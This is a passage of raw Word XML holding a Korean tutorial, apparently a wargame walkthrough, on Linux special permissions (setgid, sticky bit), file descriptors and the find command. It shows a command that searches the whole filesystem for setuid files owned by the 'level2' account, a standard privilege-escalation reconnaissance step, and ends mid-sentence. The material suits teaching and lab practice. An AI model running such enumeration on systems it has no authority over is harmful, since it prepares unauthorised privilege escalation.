        <w:t>setgid를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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준다면 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>rwxr-sr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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바뀌고 숫자로는 2754가 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>sticky bit는 디렉터리에 줄 수 있는 권한으로 주로 공유폴더에 적용합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087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예를들면</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>drwxrwxrwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA5087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이고, 숫자로는 1777인 것을 볼 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>sticky bit가 적용된 폴더에서는 어떤 파일의 소유주나 root만 그 파일을 삭제할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5087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 xml:space="preserve">=find 명령어의 사용법= </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00D14EC3" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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D14EC3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힌트를</w:t>
      </w:r>
      <w:r w:rsidRPr="00D14EC3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수행하기 위해서는 find 명령어를 사용하면 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00D14EC3" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087" w:rsidRPr="00D14EC3" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D14EC3">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D14EC3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/ -user level2 -perm -4000 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00D14EC3" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D14EC3">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D14EC3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/ -user level2 -perm +4000 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRPr="00D14EC3" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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AA5087" w:rsidRPr="00D14EC3" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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D14EC3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가장</w:t>
      </w:r>
      <w:r w:rsidRPr="00D14EC3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간단하게는 위의 두 명령어로 찾을 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA5087" w:rsidRDefault="00AA5087" w:rsidP="00AA5087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D14EC3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실행</w:t>
      </w:r>
      <w:r w:rsidRPr="00D14EC3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결과는 다음과 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D14EC3" w:rsidRDefault="00D14EC3" w:rsidP="00AA5087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D14EC3" w:rsidRDefault="00C53907" w:rsidP="00AA5087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>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6381750" cy="638175"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="그림 1" descr="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907" w:rsidRDefault="00C53907" w:rsidP="00AA5087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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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그렇다면</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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해당 명령어의 의미를 알아보겠습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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먼저</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>, find / -user level2 -perm -4000 이라는 의미는</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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디렉터리</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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/ 부터 파일을 찾는데, user가 level2이고, permission은 -4000을 가진 파일을 찾는다는 것입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00703A66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>=file descriptor의 개념=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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 xml:space="preserve">다음으로 </w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2&gt;/dev/null 의 의미를 알기</w:t>
      </w:r>
      <w:r w:rsidR="00C56C26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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>위해서</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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먼저 file descriptor(윈도우에서는 handle)의 개념을 알려드리겠습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66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리눅스에서</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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각 프로세스는 PCB(Process Control Block)과 FDT(File Descriptor Table)을 갖고 있습니다</w:t>
      </w:r>
      <w:r w:rsidR="00A25377">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A25377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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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PCB는 프로세스의 각종 상태정보를 담고 있습니다. PCB는 일단 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>이정도로만</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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알면 됩니다. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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그리고</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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FDT는 실행</w:t>
      </w:r>
      <w:r w:rsidR="00A25377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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>중에 어떤 파일에 대한 접근을 관리하기 위한 테이블입니다</w:t>
      </w:r>
      <w:r w:rsidR="00BE400B">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE400B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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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이</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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테이블은 프로세스가 접근하는 각 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>파일에대한</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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file descriptor 번호와, 해당 파일의 file pointer를 가지고 있습니다.</w:t>
      </w:r>
      <w:r w:rsidR="00BE400B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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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이</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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file pointer는 kernel area의 system open-file table과 연결됩니다. kernel은 이를 바탕으로 프로세스에게 해당 파일을 찾아서 접근시켜 줍니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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여기서</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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이 file descriptor table의 구조는 간단합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>0번부터 각 파일에 번호를 매겨놓고 그 번호로 파일에 접근을 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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그런데</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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0번은 표준입력을 의미합니다. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>리눅스에서는</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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많은 것들을 파일로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>간주하기때문에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>이런것도</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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파일로 관리합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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그리고</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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1번은 표준출력, 2번은 표준에러를 의미합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3번부터 우리가 보통 생각하는 파일의 번호가 시작됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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물론</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>리눅스에선</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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소켓도 파일로 간주하기 때문에 소켓에 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>접근할</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>때도</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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FDT를 사용합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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실제적으로</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>사용할때는</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>예를들어</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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우리가 C언어의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>fopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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함수로 파일을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>열때</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>리턴값을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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정수형 변수에 저장해주는데, </w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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그</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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저장되는 값이 file descriptor입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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그렇다면</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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이제 2&gt;/dev/null의 의미를 알 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2는 표준 에러이고, &gt;는 Output Redirect를 의미합니다. find명령어의 결과값을 오른쪽으로 보내라는 의미입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>/dev/null은 간단히 말해 윈도우의 휴지통과 같은 의미라고 생각하면 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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따라서</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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이 의미는, 에러가 뜬 결과는 모두 삭제한 최종 결과(표준 출력 1번)만을 보여달라는 것입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00416A69" w:rsidRDefault="00703A66" w:rsidP="00703A66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00416A69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>=find 명령어의 사용법(자세하게)=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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그런데</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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-perm 옵션에서 -4000과 +4000의 차이는 무엇일까요?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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일단</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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-4000과 +4000은 똑같다고 보면 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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차이가</w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>나는건</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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-6000 +6000과 같이 즉, setuid+setgid 같이 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>두개</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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이상의 권한을 가진 파일을 찾을</w:t>
      </w:r>
      <w:r w:rsidR="000A2F78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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>때 차이가 납니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00703A66" w:rsidRPr="00416A69" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66" w:rsidRPr="00703A66" w:rsidRDefault="00703A66" w:rsidP="00703A66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703A66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-6000은 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00703A66">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00703A66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와 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
